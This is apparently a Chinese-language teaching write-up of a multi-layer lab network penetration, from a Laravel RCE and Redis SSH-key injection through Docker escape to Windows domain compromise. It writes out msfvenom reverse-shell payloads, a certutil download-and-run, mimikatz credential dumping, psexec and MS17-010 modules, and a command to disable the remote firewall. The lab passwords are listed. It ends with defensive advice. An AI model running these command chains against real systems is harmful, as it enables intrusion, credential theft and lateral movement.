内网安全-记一次内网靶机渗透
字数 1267 2025-08-29 08:31:35
内网靶机渗透实战教学文档
环境概述
本靶场模拟了一个多层内网环境,包含以下组件:
- DMZ区:Ubuntu主机(web1),运行Nginx和Redis服务
- 第二层网络:Ubuntu主机(web2),运行Docker容器
- 第三层网络:Windows 7主机(PC1),运行通达OA系统
- 域环境:包含多台Windows主机
初始账户信息
-
域用户:
- Administrator:Whoami2021
- whoami:Whoami2021
- bunny:Bunny2021
- moretz:Moretz2021
-
Ubuntu主机:
- web1: web:web2021
- web2: ubuntu:ubuntu
-
通达OA:
- admin:admin657260
渗透流程详解
第一阶段:外网渗透
-
端口扫描
nmap -T4 -sC -sV 192.168.46.160发现81端口运行Laravel框架
-
Laravel RCE漏洞利用(CVE-2021-3129)
- 使用公开EXP:
python laravel-CVE-2021-3129-EXP.py http://目标地址 - 上传Webshell(哥斯拉/冰蝎/蚁剑)
- 使用公开EXP:
-
识别Docker环境
- 通过Webshell发现目标运行在Docker容器中
- 准备进行Docker逃逸
第二阶段:Redis未授权访问利用
-
全端口扫描
nmap -T4 -sC -sV -p1-65535 192.168.xx.xxx发现6379 Redis端口开放
-
Redis未授权访问利用
- 连接Redis:
redis-cli -h 192.168.xx.xxxxx - SSH公钥注入:
ssh-keygen -t rsa (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt cat 1.txt | redis-cli -h 192.168.46.160 -p 6379 -x set hello config set dir /root/.ssh config set dbfilename authorized_keys save - SSH连接:
ssh root@192.168.46.160
- 连接Redis:
-
建立持久化会话
- 生成Linux后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.46.158 lport=6666 -f elf -o p1.elf - 上传并执行
- MSF监听:
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.46.158 set lport 6666 exploit
- 生成Linux后门:
第三阶段:内网横向移动
-
添加路由
sessions 1 run get_local_subnets run autoroute -p run post/multi/manage/autoroute -
内网探测
use auxiliary/scanner/discovery/udp_probe set rhosts 192.168.52.1-255 set threads 10 run -
Linux提权
- 查找SUID文件:
find / -user root -perm -4000 -print 2>/dev/null - 环境变量提权:
cd /home/jobs ./shell chmod 777 pscp /bin/bash /tmp/ps export PATH=/tmp:$PATH ./shell
- 查找SUID文件:
-
Docker逃逸
fdisk -l mkdir /hello mount /dev/sda1 /hello cp -avx /hello/home/ubuntu/.ssh/id_rsa.pub /hello/home/ubuntu/.ssh/authorized_keys -avx echo 'SSH公钥' > /hello/home/ubuntu/.ssh/authorized_keys ssh -i 密钥文件 ubuntu@192.168.52.20
第四阶段:Windows域渗透
-
通达OA漏洞利用
- 任意用户登录漏洞:
- 修改请求包,添加Uid头
- 获取有效SESSID
- 文件上传漏洞:
POST /ispirit/im/upload.php HTTP/1.1 [上传恶意文件] - 文件包含RCE:
POST /ispirit/interface/gateway.php HTTP/1.1 json={"url":"/general/../../attach/im/图片路径"}&cmd=whoami
- 任意用户登录漏洞:
-
Windows后门
- 生成后门:
msfvenom -p windows/meterpreter/bind_tcp LPORT=7777 -f exe > w7.exe - 下载执行:
certutil -urlcache -split -f http://192.168.52.10:81/w7.exe c:/w7.exe - MSF监听:
use exploit/multi/handler set payload windows/meterpreter/bind_tcp set rhost 192.168.52.30 set lport 7777 exploit
- 生成后门:
-
域内横向移动
- 使用kiwi(mimikatz)获取凭据:
load kiwi kiwi_cmd sekurlsa::logonpasswords - psexec横向移动:
use exploit/windows/smb/psexec set payload windows/meterpreter/bind_tcp set rhost 192.168.93.30 set smbuser Administrator set smbpass Whoami2021 exploit - MS17-010利用:
use exploit/windows/smb/ms17_010_psexec set payload windows/meterpreter/bind_tcp set rhost 192.168.93.40 exploit
- 使用kiwi(mimikatz)获取凭据:
-
防火墙绕过
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator" sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\192.168.93.30 start unablefirewall
关键漏洞总结
-
Laravel Debug mode RCE (CVE-2021-3129)
- 影响版本:Laravel框架特定配置
- 利用方式:通过公开EXP直接获取代码执行权限
-
Redis未授权访问
- 利用方式:SSH公钥注入、写定时任务、写Webshell
- 防御:设置密码认证、限制绑定IP
-
Linux提权技术
- SUID提权
- 环境变量提权
- Docker逃逸
-
通达OA漏洞
- 任意用户登录
- 文件上传+文件包含RCE
-
Windows域渗透技术
- Mimikatz凭据获取
- psexec横向移动
- MS17-010永恒之蓝漏洞
防御建议
-
基础安全措施
- 及时更新系统和应用补丁
- 禁用不必要的服务和端口
- 配置强密码策略
-
中间件安全
- Redis配置认证密码
- Docker配置适当的隔离策略
-
内网安全
- 实施网络分段
- 监控异常流量和行为
- 限制域管理员权限
-
应用安全
- 关闭调试模式
- 实施输入验证和过滤
- 限制文件上传类型和目录
本教学文档涵盖了从外网渗透到内网横向移动的全过程,涉及多种漏洞利用和提权技术,可作为内网渗透测试的实战参考。